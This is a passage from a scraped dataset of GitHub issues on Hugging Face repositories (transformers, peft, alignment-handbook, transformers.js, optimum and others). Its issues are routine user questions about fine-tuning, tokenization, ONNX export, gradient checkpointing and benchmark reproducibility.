SentenceTransformer('msmarco-distilbert-cos-v5')\r\n\r\n# Example query\r\nquery = \"Semantic search example query\"\r\n\r\n# Example corpus\r\ncorpus = [\"Example sentence 1\", \"Example sentence 2\", \"Example sentence 3\", ...] # Add more sentences to your corpus\r\n\r\n# Encode the query and corpus into embeddings\r\nquery_embedding = model.encode(query, convert_to_tensor=True)\r\ncorpus_embeddings = model.encode(corpus, convert_to_tensor=True)\r\n\r\n# Compute cosine similarities\r\ncosine_similarities = util.pytorch_cos_sim(query_embedding, corpus_embeddings)[0]\r\n\r\n# Get indices of the 3 nearest neighbors\r\nindices_nearest_neighbors = pd.Series(cosine_similarities).nlargest(3).index\r\n\r\n# Retrieve the 3 nearest neighbors\r\nnearest_neighbors = [corpus[i] for i in indices_nearest_neighbors]\r\n\r\n# Print the results\r\nprint(f\"Query: {query}\")\r\nprint(\"3 Nearest Neighbors:\")\r\nfor neighbor in nearest_neighbors:\r\n print(\"-\", neighbor)\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2359", "state": "open", "labels": [], "created_at": "2023-11-20T14:52:21Z", "updated_at": "2023-11-20T14:52:21Z", "user": "Yarmohamadshr" }, { "repo": "huggingface/alignment-handbook", "number": 42, "title": "How to QLoRA training with ZeRO-3 on two or more GPUs?", "body": "I added a 4-bit load after the command LoRA training with ZeRO-3 on two or more GPUs to achieve a mix of QLoRA and ZeRO-3. But the program encountered the following error:\r\nRuntimeError: expected there to be only one unique element in .all_gather_coalesced.. at 0x7f2ec8daf900> \r\nThe command is:\r\nACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/deepspeed_zero3.yaml --num_processes=2 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml --load_in_4bit=true\r\n\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/42", "state": "open", "labels": [], "created_at": "2023-11-20T14:13:36Z", "updated_at": "2024-05-17T00:27:27Z", "user": "Di-Zayn" }, { "repo": "huggingface/transformers", "number": 27600, "title": "How to get input sentence embedding from Llama or Llama2?", "body": "I'm trying to get the sentence embedding that I input, I checked some common practice to do it, but I'm not sure I'm doing the it right. Who may be help? @gante Thanks if you can be help. my code is as below: \r\n\r\n```\r\n model = LlamaForCausalLM.from_pretrained(\r\n args.pretrained_name_or_path,\r\n torch_dtype=torch.float16,\r\n device_map=device,\r\n)\r\ntokenizer = LlamaTokenizer.from_pretrained(args.pretrained_name_or_path, fast_tokenizer=True)\r\nmodel.to(device)\r\nmodel.eval()\r\ntokenizer.pad_token_id = 0\r\ntokenizer.padding_side = \"left\"\r\n\r\nfor i in range(0, len(sentences), batch_size):\r\n batch_sentences = sentences[i: i+batch_size]\r\n inputs = tokenizer(batch_sentences, padding=True, truncation=False, return_tensors='pt')\r\n inputs = inputs.to(device)\r\n\r\n with torch.no_grad():\r\n outputs = model(**inputs, output_hidden_states=True)\r\n hidden_states = outputs.hidden_states[-1]\r\n sentence_embeddings = hidden_states[:, -1, :] # # here is using the **last token's** last layer hidden states as sentence embeddings,\r\n # or sentence_embeddings = outputs.hidden_states[-1].mean(dim=1) # here use average sentence embedding. \r\n # and I'm not sure which one is better.\r\n embeddings.append(sentence_embeddings.cpu())\r\n\r\nembeddings = torch.cat(embeddings, dim=0)\r\n```\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/27600", "state": "closed", "labels": [], "created_at": "2023-11-20T13:18:08Z", "updated_at": "2023-11-22T14:32:26Z", "user": "waterluck" }, { "repo": "huggingface/transformers", "number": 27592, "title": "How to always use initial prompt in Whisper?", "body": "I checked this PR (#22496 ) but still can't figure out how to always use the initial prompt. is it possible to provide a use case?", "url": "https://github.com/huggingface/transformers/issues/27592", "state": "closed", "labels": [], "created_at": "2023-11-19T18:35:23Z", "updated_at": "2023-11-20T08:29:41Z", "user": "GanymedeNil" }, { "repo": "huggingface/pytorch-image-models", "number": 2038, "title": "how to run the efficientmit.py", "body": "**Is your feature request related to a problem? Please describe.**\r\nA clear and concise description of what the problem is.\r\n\r\n**Describe the solution you'd like**\r\nA clear and concise description of what you want to happen.\r\n\r\n**Describe alternatives you've considered**\r\nA clear and concise description of any alternative solutions or features you've considered.\r\n\r\n**Additional context**\r\nAdd any other context or screenshots about the feature request here.\r\n", "url": "https://github.com/huggingface/pytorch-image-models/issues/2038", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-11-19T02:50:59Z", "updated_at": "2023-11-19T17:16:48Z", "user": "1377534928" }, { "repo": "huggingface/chat-ui", "number": 566, "title": "Is Chat-UI gonna support the new Assistant API?", "body": "They store the threads, and there's also multi-modal support", "url": "https://github.com/huggingface/chat-ui/issues/566", "state": "open", "labels": [ "enhancement", "models" ], "created_at": "2023-11-19T02:06:44Z", "updated_at": "2023-11-20T08:42:49Z", "comments": 1, "user": "wayliums" }, { "repo": "huggingface/alignment-handbook", "number": 40, "title": "How do I get the training scrips to utilize all my GPUs?", "body": "Hello there,\r\n\r\nI'm running this script:\r\n```\r\nACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml\r\n```\r\n\r\n... but on my machine with 2x3090s ... only GPU 0 is being utilized. \r\n\r\nWhat do I need to change to utlize both of my 3090s for the training run?\r\n\r\nThanks", "url": "https://github.com/huggingface/alignment-handbook/issues/40", "state": "closed", "labels": [], "created_at": "2023-11-19T00:11:24Z", "updated_at": "2023-11-19T01:20:21Z", "user": "ohmeow" }, { "repo": "huggingface/transformers.js", "number": 401, "title": "[Question | Bug] What am I doing wrong while using the `question-answering` model?", "body": "## The Problem\r\n\r\nI'm trying to use `question-answering` model to answer simple questions in a given context. But I always get a TypeError about floats. I guess that's an internal issue, because at top level of code I am not using floating point numbers. But maybe I am doing something wrong.\r\n\r\nBy the way, I'm using TypeScript and I was following the [docs for this model](https://huggingface.co/docs/transformers.js/api/pipelines#module_pipelines.QuestionAnsweringPipeline).\r\n\r\n## Code\r\n\r\n```ts\r\n/** THIS CODE IS WRAPPED BY AN ASYNC FUNCTION */\r\n\r\nconst { pipeline } = await import(\"@xenova/transformers\");\r\n\r\nconst answerer = await pipeline(\r\n \"question-answering\",\r\n \"Xenova/distilbert-base-uncased-distilled-squad\"\r\n);\r\n\r\nconst results = await answerer(\r\n \"Who is Dominic Toretto?\",\r\n \"Dominic Toretto is part of the family.\"\r\n);\r\n```\r\n\r\n## Error\r\n\r\nTypeError: A float32 tensor's data must be type of function Float32Array()\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/53703706/a248457f-e47a-4f42-8604-622bf8fe49ed)\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/53703706/a9f50b80-c9d6-4a83-aea7-908afd684759)\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/401", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-18T12:58:50Z", "updated_at": "2023-11-19T12:44:00Z", "user": "AyresMonteiro" }, { "repo": "huggingface/transformers.js", "number": 399, "title": "[Question] Is it possible to encode and decode with `AutoTokenizer.from_pretrained` and keep spaces?", "body": "I'm trying to build a pure JS online tokenizer, visually similar to https://github.com/1rgs/tokenwiz (but without the Python backend)\r\n\r\nI'm doing something like:\r\n\r\n```js\r\nconst model = await AutoTokenizer.from_pretrained('mistralai/Mistral-7B-v0.1')\r\nconst textInput = `[INST] <>\r\nYou are a friendly Llama.\r\n<>\r\n\r\nDo you spit at people? [/INST]`\r\nconst tokens = model.encode(textInput)\r\nconst tokenizedText = model.batch_decode(\r\n tokens.map((token) => [token]),\r\n { clean_up_tokenization_spaces: false }\r\n)\r\nconsole.log(tokenizedText)\r\n```\r\n\r\nAnd get:\r\n\r\n```js\r\n0: \"\"\r\n1: \"[\"\r\n2: \"INST\"\r\n3: \"]\"\r\n4: \"<<\"\r\n5: \"SYS\"\r\n6: \">>\"\r\n7: \"\\n\"\r\n8: \"You\"\r\n9: \"are\"\r\n10: \"a\"\r\n11: \"friendly\"\r\n12: \"L\"\r\n13: \"l\"\r\n14: \"ama\"\r\n15: \".\"\r\n16: \"\\n\"\r\n17: \"<\"\r\n18: \">\"\r\n21: \"\\n\"\r\n22: \"\\n\"\r\n23: \"Do\"\r\n24: \"you\"\r\n25: \"sp\"\r\n26: \"it\"\r\n27: \"at\"\r\n28: \"people\"\r\n29: \"?\"\r\n30: \"[\"\r\n31: \"/\"\r\n32: \"INST\"\r\n33: \"]\"\r\n```\r\n\r\nSo while newlines are there, all the spaces are gone. Is there any way to get the original text back but with token boundaries for visualisation?", "url": "https://github.com/huggingface/transformers.js/issues/399", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-17T18:46:05Z", "updated_at": "2023-11-17T20:18:02Z", "user": "daaain" }, { "repo": "huggingface/alignment-handbook", "number": 39, "title": "Why zephyr-7b-dpo-lora is finetuned from mistralai/Mistral-7B-v0.1 instead of zepher-7b-sft model?", "body": "There is a misalignment between zephyr-7b-dpo-lora and zephyr-7b-dpo-full.\r\nThe former one is finetuned from mistralai/Mistral-7B-v0.1.\r\nThe latter is finetuned from zephyr-7b-dpo-full.\r\n\r\nI wonder what causes this misalignment ?\r\n\r\nAlso, have you benchmarked performance improvement of the lora finetunning script? In my experiment, lora finetunning seems do not provide any performance improvement compared with the base model on MT-bench. I think maybe some parameters are incorrect. ", "url": "https://github.com/huggingface/alignment-handbook/issues/39", "state": "open", "labels": [], "created_at": "2023-11-17T18:11:59Z", "updated_at": "2024-03-21T19:18:08Z", "comments": 2, "user": "ChenDRAG" }, { "repo": "huggingface/optimum", "number": 1545, "title": "Add support to export facebook encodec models to ONNX", "body": "### Feature request\n\nWhen I try to use optimum-cli to export the facebook/encodec_32khz model I get this error:\r\n```\r\n% optimum-cli export onnx --model facebook/encodec_32khz encodec.onnx\r\nFramework not specified. Using pt to export to ONNX.\r\n/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/torch/nn/utils/weight_norm.py:30: UserWarning: torch.nn.utils.weight_norm is deprecated in favor of torch.nn.utils.parametrizations.weight_norm.\r\n warnings.warn(\"torch.nn.utils.weight_norm is deprecated in favor of torch.nn.utils.parametrizations.weight_norm.\")\r\nTraceback (most recent call last):\r\n File \"/Users/micchig/micromamba/envs/music-representation/bin/optimum-cli\", line 10, in \r\n sys.exit(main())\r\n ^^^^^^\r\n File \"/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/optimum/commands/optimum_cli.py\", line 163, in main\r\n service.run()\r\n File \"/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/optimum/commands/export/onnx.py\", line 246, in run\r\n main_export(\r\n File \"/Users/micchig/micromamba/envs/music-representation/lib/python3.11/site-packages/optimum/exporters/onnx/__main__.py\", line 408, in main_export\r\n raise ValueError(\r\nValueError: Trying to export a encodec model, that is a custom or unsupported architecture for the task feature-extraction, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type encodec to be supported natively in the ONNX export.\r\n```\r\nI am following the advice in the message and opening an issue here. :)\n\n### Motivation\n\nI want to use the encodec model for inference and I'd much rather use ONNX than importing the pretrained model from transformers every time and run it in pytorch as ONNX is much faster.\n\n### Your contribution\n\nI'm afraid I can't contribute to this personally", "url": "https://github.com/huggingface/optimum/issues/1545", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2023-11-17T11:16:01Z", "updated_at": "2025-12-12T06:23:33Z", "comments": 6, "user": "giamic" }, { "repo": "huggingface/peft", "number": 1142, "title": "How to do Gradient Checkpoint + LoRA", "body": "### System Info\r\n\r\n\"image\"\r\n\r\n### Who can help?\r\n\r\nI need help with using LoRA + gradient checkpointing.\r\nUsing the reentrant option appears to be the solution, but it slows down training a lot, for LLama-7b it's more than 2x the training time of a full fine-tune on the same hardware (A100).\r\n\"image\"\r\n\r\nWe should be able to just use vanilla gradient checkpoint.\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\n```python\r\nimport torch\r\nfrom transformers import AutoModelForCausalLM\r\nfrom peft import LoraConfig, get_peft_model\r\n\r\n# model_id, vocab = 'meta-llama/Llama-2-7b-hf', 32000\r\nmodel_id, vocab = \"stas/tiny-random-llama-2\", 3000\r\n\r\nseq_len = 1024\r\nbs=8\r\nuse_lora=True\r\n\r\nmodel_config = dict(\r\n pretrained_model_name_or_path=model_id,\r\n device_map=0,\r\n trust_remote_code=True,\r\n low_cpu_mem_usage=True,\r\n torch_dtype=torch.bfloat16,\r\n use_cache=False,\r\n)\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(**model_config)\r\n\r\n# Just freeze embeddings for small memory decrease\r\nmodel.model.embed_tokens.weight.requires_grad_(False);\r\n\r\nif use_lora:\r\n lora_config = LoraConfig(\r\n r=2, # the rank of the LoRA matrices\r\n lora_alpha=16, # the weight\r\n lora_dropout=0.1, # dropout to add to the LoRA layers\r\n bias=\"none\", # add bias to the nn.Linear layers?\r\n task_type=\"CAUSAL_LM\",\r\n target_modules=[\"q_proj\", \"k_proj\",\"v_proj\",\"o_proj\"], # the name of the layers to add LoRA\r\n )\r\n \r\n model = get_peft_model(model, lora_config)\r\n\r\nexample = {\"input_ids\": torch.randint(0, vocab, size=(bs,seq_len), device=\"cuda:0\"), \r\n \"labels\":torch.randint(0, vocab, size=(bs,seq_len), device=\"cuda:0\")}\r\n\r\nimport torch, peft, accelerate, transformers\r\nfor lib in [torch, peft, accelerate, transformers]:\r\n print(f\"{lib.__name__}: {lib.__version__}\")\r\n\r\nmodel.train()\r\ndef call_forward():\r\n with torch.amp.autocast(\"cuda\", dtype=torch.bfloat16):\r\n out = model(**example)\r\n loss = out.loss\r\n return loss\r\n\r\n%timeit loss=call_forward()\r\nloss=call_forward()\r\nloss.requires_grad\r\n# 5.48 ms \u00b1 31.1 \u00b5s per loop (mean \u00b1 std. dev. of 7 runs, 100 loops each)\r\n# True\r\n\r\nmodel.gradient_checkpointing_enable()\r\n%timeit loss=call_forward()\r\nloss=call_forward()\r\nloss.requires_grad\r\n# 5.13 ms \u00b1 33.6 \u00b5s per loop (mean \u00b1 std. dev. of 7 runs, 100 loops each)\r\n# False\r\n\r\nmodel.gradient_checkpointing_enable(dict(use_reentrant=False))\r\n%timeit loss=call_forward()\r\nloss=call_forward()\r\nloss.requires_grad\r\n# 7.23 ms \u00b1 40.1 \u00b5s per loop (mean \u00b1 std. dev. of 7 runs, 100 loops each)\r\n# True\r\n```\r\n\r\n### Expected behavior\r\n\r\nNothing to add here.", "url": "https://github.com/huggingface/peft/issues/1142", "state": "closed", "labels": [], "created_at": "2023-11-17T09:34:16Z", "updated_at": "2025-10-06T10:22:58Z", "user": "tcapelle" }, { "repo": "huggingface/accelerate", "number": 2164, "title": "how to get same timestamp in different subprocesses while using accelerate launch", "body": "I would like to get a unique timestamp to name my result folder like below \r\n```\r\ndef get_time_string() -> str:\r\n x = datetime.datetime.now()\r\n return f\"{(x.year - 2000):02d}{x.month:02d}{x.day:02d}-{x.hour:02d}{x.minute:02d}{x.second:02d}\"\r\n```\r\n, however, it sometimes will get a different timestamp in different subprocesses, is there anyway to get a unique timestamp?\r\nThanks very much for your time!", "url": "https://github.com/huggingface/accelerate/issues/2164", "state": "closed", "labels": [], "created_at": "2023-11-17T06:36:00Z", "updated_at": "2023-11-29T07:30:04Z", "user": "shliu0" }, { "repo": "huggingface/open_asr_leaderboard", "number": 14, "title": "How to run calc_rtf.py? Cannot reproduce rtf results.", "body": "There is no guide on how to execute calc_rtf.py. For example, this one https://github.com/huggingface/open_asr_leaderboard/blob/main/transformers/calc_rtf.py references 4469669.mp3. But there is no such file in the repo from what I see.\r\n\r\nSo the results are not reproducible.\r\n\r\nSame for https://github.com/huggingface/open_asr_leaderboard/blob/main/nemo_asr/calc_rtf.py What is /disk3/datasets/speech-datasets/earnings22/media/4469669.wav?\r\n\r\nBTW, I don't recommend simply copying the same sample multiple times for an evaluation. It can cause performance that looks too good compared to running in production. While the data won't be cached, the same chunks of external language models will get hit multiple times, giving better-than-reality results, as one example. What that means is that, for example, the whisper models are never diverging across elements in the batch in the sequence they are producing. This can cause the embedding lookup to be better than it really should be.\r\n\r\nI got my RTFx results in https://arxiv.org/abs/2311.04996 by cahcing the entire dataset in memory https://github.com/nvidia-riva/riva-asrlib-decoder/blob/8282368816552a7ee22c9340dce7b9c3c8d1f193/src/riva/asrlib/decoder/test_graph_construction.py#L77-L89 This is what we do at MLPerf Inference benchmarks as well. Which is the gold standard for benchmarking.", "url": "https://github.com/huggingface/open_asr_leaderboard/issues/14", "state": "open", "labels": [], "created_at": "2023-11-16T21:14:31Z", "updated_at": "2023-11-16T21:14:31Z", "user": "galv" }, { "repo": "huggingface/transformers.js", "number": 397, "title": "[Question] Tokenizing a base64 for string is very slow?", "body": "Hi! I happened to be encoding some files using transformers.js and one of the files happened to have some base64 in it. What I noticed is that base64 takes an enormously long time, relative to the number of tokens produced. Tokenizing a string of english text to the same number of tokens is far quicker. \r\nFor example:\r\n```javascript\r\nconst testBase64 =\r\n \"VGhlIFNwYW5pc2ggQ2l2aWwgV2FyIChTcGFuaXNoOiBHdWVycmEgQ2l2aWwgRXNwYcOxb2xhKVtub3RlIDJdIHdhcyBmb3VnaHQgZnJvbSAxOTM2IHRvIDE5MzkgYmV0d2VlbiB0aGUgUmVwdWJsaWNhbnMgYW5kIHRoZSBOYXRpb25hbGlzdHMuIFJlcHVibGljYW5zIHdlcmUgbG95YWwgdG8gdGhlIGxlZnQtbGVhbmluZyBQb3B1bGFyIEZyb250IGdvdmVybm1lbnQgb2YgdGhlIFNlY29uZCBTcGFuaXNoIFJlcHVibGljLCBhbmQgY29uc2lzdGVkIG9mIHZhcmlvdXMgc29jaWFsaXN0LCBjb21tdW5pc3QsIHNlcGFyYXRpc3QsIGFuYXJjaGlzdCwgYW5kIHJlcHVibGljYW4gcGFydGllcywgc29tZSBvZiB3aGljaCBoYWQgb3Bwb3NlZCB0aGUgZ292ZXJubWVudCBpbiB0aGUgcHJlLXdhciBwZXJpb2QuWzEyXSBUaGUgb3Bwb3NpbmcgTmF0aW9uYWxpc3RzIHdlcmUgYW4gYWxsaWFuY2Ugb2YgRmFsYW5naXN0cywgbW9uYXJjaGlzdHMsIGNvbnNlcnZhdGl2ZXMsIGFuZCB0cmFkaXRpb25hbGlzdHMgbGVkIGJ5IGEgbWlsaXRhcnkganVudGEgYW1vbmcgd2hvbSBHZW5lcmFsIEZyYW5jaXNjbyBGcmFuY28gcXVpY2tseSBhY2hpZXZlZCBhIHByZXBvbmRlcmFudCByb2xlLiBEdWUgdG8gdGhlIGludGVybmF0aW9uYWwgcG9saXRpY2FsIGNsaW1hdGUgYXQgdGhlIHRpbWUsIHRoZSB3YXIgaGFkIG1hbnkgZmFjZXRzIGFuZCB3YXMgdmFyaW91c2x5IHZpZXdlZCBhcyBjbGFzcyBzdHJ1Z2dsZSwgYSByZWxpZ2lvdXMgc3RydWdnbGUsIGEgc3RydWdnbGUgYmV0d2VlbiBkaWN0YXRvcnNoaXAgYW5kIHJlcHVibGljYW4gZGVtb2NyYWN5LCBiZXR3ZWVuIHJldm9sdXRpb24gYW5kIGNvdW50ZXJyZXZvbHV0aW9uLCBhbmQgYmV0d2VlbiBmYXNjaXNtIGFuZCBjb21tdW5pc20uWzEzXSBBY2NvcmRpbmcgdG8gQ2xhdWRlIEJvd2VycywgVS5TLiBhbWJhc3NhZG9yIHRvIFNwYWluIGR1cmluZyB0aGUgd2FyLCBpdCB3YXMgdGhlICJkcmVzcyByZWhlYXJzYWwiIGZvciBXb3JsZCBXYXIgSUkuWzE0XSBUaGUgTmF0aW9uYWxpc3RzIHdvbiB0aGUgd2FyLCB3aGljaCBlbmRlZCBpbiBlYXJseSAxOTM5LCBhbmQgcnVsZWQgU3BhaW4gdW50aWwgRnJhbmNvJ3MgZGVhdGggaW4gTm92ZW1iZXIgMTk3NS4KClRoZSB3YXIgYmVnYW4gYWZ0ZXIgdGhlIHBhcnRpYWwgZmFpbHVyZSBvZiB0aGUgY291cCBkJ8OpdGF0IG9mIEp1bHkgMTkzNiBhZ2FpbnN0IHRoZSBSZXB1YmxpY2FuIGdvdmVybm1lbnQgYnkgYSBncm91cCBvZiBnZW5lcmFscyBvZiB0aGUgU3BhbmlzaCBSZXB1YmxpY2FuIEFybWVkIEZvcmNlcywgd2l0aCBHZW5lcmFsIEVtaWxpbyBNb2xhIGFzIHRoZSBwcmltYXJ5IHBsYW5uZXIgYW5kIGxlYWRlciBhbmQgaGF2aW5nIEdlbmVyYWwgSm9zw6kgU2FuanVyam8gYXMgYSBmaWd1cmVoZWFkLiBUaGUgZ292ZXJubWVudCBhdCB0aGUgdGltZSB3YXMgYSBjb2FsaXRpb24gb2YgUmVwdWJsaWNhbnMsIHN1cHBvcnRlZCBpbiB0aGUgQ29ydGVzIGJ5IGNvbW11bmlzdCBhbmQgc29jaWFsaXN0IHBhcnRpZXMsIHVuZGVyIHRoZSBsZWFkZXJzaGlwIG9mIGNlbnRyZS1sZWZ0IFByZXNpZGVudCBNYW51ZWwgQXphw7FhLlsxNV1bMTZdIFRoZSBOYXRpb25hbGlzdCBmYWN0aW9uIHdhcyBzdXBwb3J0ZWQgYnkgYSBudW1iZXIgb2YgY29uc2VydmF0aXZlIGdyb3VwcywgaW5jbHVkaW5nIENFREEsIG1vbmFyY2hpc3RzLCBpbmNsdWRpbmcgYm90aCB0aGUgb3Bwb3NpbmcgQWxmb25zaXN0cyBhbmQgdGhlIHJlbGlnaW91cyBjb25zZXJ2YXRpdmUgQ2FybGlzdHMsIGFuZCB0aGUgRmFsYW5nZSBFc3Bhw7FvbGEgZGUgbGFzIEpPTlMsIGEgZmFzY2lzdCBwb2xpdGljYWwgcGFydHkuWzE3XSBBZnRlciB0aGUgZGVhdGhzIG9mIFNhbmp1cmpvLCBFbWlsaW8gTW9sYSBhbmQgTWFudWVsIEdvZGVkIExsb3BpcywgRnJhbmNvIGVtZXJnZWQgYXMgdGhlIHJlbWFpbmluZyBsZWFkZXIgb2YgdGhlIE5hdGlvbmFsaXN0IHNpZGUuCgpUaGUgY291cCB3YXMgc3VwcG9ydGVkIGJ5IG1pbGl0YXJ5IHVuaXRzIGluIE1vcm9jY28sIFBhbXBsb25hLCBCdXJnb3MsIFphcmFnb3phLCBWYWxsYWRvbGlkLCBDw6FkaXosIEPDs3Jkb2JhLCBhbmQgU2V2aWxsZS4gSG93ZXZlciwgcmViZWxsaW5nIHVuaXRzIGluIGFsbW9zdCBhbGwgaW1wb3J0YW50IGNpdGllc+KAlHN1Y2ggYXMgTWFkcmlkLCBCYXJjZWxvbmEsIFZhbGVuY2lhLCBCaWxiYW8sIGFuZCBNw6FsYWdh4oCUZGlkIG5vdCBnYWluIGNvbnRyb2wsIGFuZCB0aG9zZSBjaXRpZXMgcmVtYWluZWQgdW5kZXIgdGhlIGNvbnRyb2wgb2YgdGhlIGdvdmVybm1lbnQuIFRoaXMgbGVmdCBTcGFpbiBtaWxpdGFyaWx5IGFuZCBwb2xpdGljYWxseSBkaXZpZGVkLiBUaGUgTmF0aW9uYWxpc3RzIGFuZCB0aGUgUmVwdWJsaWNhbiBnb3Zlcm5tZW50IGZvdWdodCBmb3IgY29udHJvbCBvZiB0aGUgY291bnRyeS4gVGhlIE5hdGlvbmFsaXN0IGZvcmNlcyByZWNlaXZlZCBtdW5pdGlvbnMsIHNvbGRpZXJzLCBhbmQgYWlyIHN1cHBvcnQgZnJvbSBGYXNjaXN0IEl0YWx5LCBOYXppIEdlcm1hbnkgYW5kIFBvcnR1Z2FsLCB3aGlsZSB0aGUgUmVwdWJsaWNhbiBzaWRlIHJlY2VpdmVkIHN1cHBvcnQgZnJvbSB0aGUgU292aWV0IFVuaW9uIGFuZCBNZXhpY28uIE90aGVyIGNvdW50cmllcywgc3VjaCBhcyB0aGUgVW5pdGVkIEtpbmdkb20sIEZyYW5jZSwgYW5kIHRoZSBVbml0ZWQgU3RhdGVzLCBjb250aW51ZWQgdG8gcmVjb2duaXNlIHRoZSBSZXB1YmxpY2FuIGdvdmVybm1lbnQgYnV0IGZvbGxvd2VkIGFuIG9mZmljaWFsIHBvbGljeSBvZiBub24taW50ZXJ2ZW50aW9uLiBEZXNwaXRlIHRoaXMgcG9saWN5LCB0ZW5zIG9mIHRob3VzYW5kcyBvZiBjaXRpemVucyBmcm9tIG5vbi1pbnRlcnZlbnRpb25pc3QgY291bnRyaWVzIGRpcmVjdGx5IHBhcnRpY2lwYXRlZCBpbiB0aGUgY29uZmxpY3QuIFRoZXkgZm91Z2h0IG1vc3RseSBpbiB0aGUgcHJvLVJlcHVibGljYW4gSW50ZXJuYXRpb25hbCBCcmlnYWRlcywgd2hpY2ggYWxzbyBpbmNsdWRlZCBzZXZlcmFsIHRob3VzYW5kIGV4aWxlcyBmcm9tIHByby1OYXRpb25hbGlzdCByZWdpbWVzLg==\";\r\n\r\n const { AutoTokenizer } = await import(\"@xenova/transformers\");\r\nconst tokenizer = await AutoTokenizer.from_pretrained(\r\n \"Xenova/all-MiniLM-L6-v2\"\r\n );\r\nconst startTime = Date.now();\r\nconst tokenized = tokenizer.encode(testBase64);\r\nconst endTime = Date.now();\r\nconsole.log(\"It took \", endTime - startTime, \"ms to tokenize\");\r\nconst decoded = tokenizer.decode(tokenized);\r\nconsole.log(\"Decoded: \", decoded);\r\n```\r\n\r\nTakes 56 seconds to tokenize and when decoded returns the same input string.\r\n\r\nInterestingly, similar logic ", "url": "https://github.com/huggingface/transformers.js/issues/397", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-16T20:27:51Z", "updated_at": "2023-11-17T19:48:57Z", "user": "samlhuillier" }, { "repo": "huggingface/transformers.js", "number": 396, "title": "[Question] How to use transformer.js in langchain", "body": "Hi all, I'm writing a custom LLM to use transformer.js with langchain. Does a structure like this make sense? Any advice for optimizing it or best practices to apply? \r\n\r\nAny suggestions or feedback would be greatly appreciated \ud83d\ude0a \ud83d\ude80\r\n\r\n```\r\nimport { pipeline } from \"@xenova/transformers\";\r\nimport { LLM } from \"langchain/llms/base\";\r\n\r\nclass MyHF extends LLM {\r\n static instance = null;\r\n\r\n constructor(modelTask = \"text2text-generation\", modelName = \"Xenova/LaMini-Flan-T5-783M\") {\r\n super({ maxConcurrency: 1 });\r\n this.modelTask = modelTask;\r\n this.modelName = modelName;\r\n this.llmModel = MyHF.getInstance(this.modelTask, this.modelName);\r\n }\r\n\r\n static async getInstance(modelTask, modelName, progress_callback = null) {\r\n if (this.instance === null) {\r\n this.instance = pipeline(modelTask, modelName, { progress_callback });\r\n }\r\n return this.instance;\r\n }\r\n\r\n _llmType() {\r\n return \"hf\";\r\n }\r\n\r\n async _call(prompt, options = { topk: 1 }) {\r\n const executor = await MyHF.getInstance(this.modelTask, this.modelName);\r\n const { generated_text } = await executor(prompt, options);\r\n return generated_text\r\n }\r\n}\r\n\r\nexport default MyHF;\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/396", "state": "open", "labels": [ "question" ], "created_at": "2023-11-16T17:27:52Z", "updated_at": "2023-12-21T16:27:28Z", "user": "mrddter" }, { "repo": "huggingface/autotrain-advanced", "number": 349, "title": "How to reload the checkpoints for LLM finetuning?", "body": "May I ask how to resume from the latest checkpoint using `autotrain llm` if it crashed. I only found one from the `dreambooth` trainers, but I cannot find the `resume_from_checkpoint` anywhere else. \r\n\r\nI was wondering if it has currently not fully supported this feature yet or I was missing something? It would be super helpful if anyone can kindly pointing out how to do that using autotrain?\r\n\r\nMany thanks!", "url": "https://github.com/huggingface/autotrain-advanced/issues/349", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-16T11:51:25Z", "updated_at": "2024-02-02T08:58:47Z", "user": "xihajun" }, { "repo": "huggingface/trl", "number": 1004, "title": "Guidance on how to fix the scheduler and ConstantLengthDataset", "body": "Hello,\r\n\r\nI want to fix the issue related to the `ConstantLengthDataset` not knowing the dataset's length in advance.\r\n\r\nBesides having a broken progressbar and a wrong epoch count, the only problem I see is related to the scheduler, as most of us are training using cosine with warmup; if we want a complete cycle, the scheduler needs the total number of steps to adjust the ratios accordingly.\r\n\r\nOne solution would be to \"guess\" how many batches/iteration of packed data we will see by grabbing some samples and estimating the total length. A function tries to do something like this by computing a char/tok ratio.\r\n\r\nDo you have any advice so I can draft a PR?\r\n\r\nOhh I just saw that @lvwerra has a [PR](https://github.com/huggingface/trl/pull/979) in the works, but only for \"finite\" dataset.\r\n", "url": "https://github.com/huggingface/trl/issues/1004", "state": "closed", "labels": [], "created_at": "2023-11-16T10:58:30Z", "updated_at": "2024-01-05T15:05:18Z", "user": "tcapelle" }, { "repo": "huggingface/diffusers", "number": 5816, "title": "low attention to prompt in SDXL", "body": "Hi, \r\nOne of the difference between DALLE3 and SDXL is that SDXL pay less attention to prompt,\r\nIs there a way to solve this problem? I don't Know. for example changing the text encoder to other can help to solve this problem ? \r\nThanks \r\n", "url": "https://github.com/huggingface/diffusers/issues/5816", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-16T07:24:15Z", "updated_at": "2024-01-09T15:06:55Z", "user": "saeedkhanehgir" }, { "repo": "huggingface/transformers", "number": 27526, "title": "How to preupgrade transformer cache and build the upgraded into docker image?", "body": "### System Info\r\n\r\nLinux ubuntu 22.04\r\nDocker 24.05\r\n\r\nI am not sure if this is the right place for this 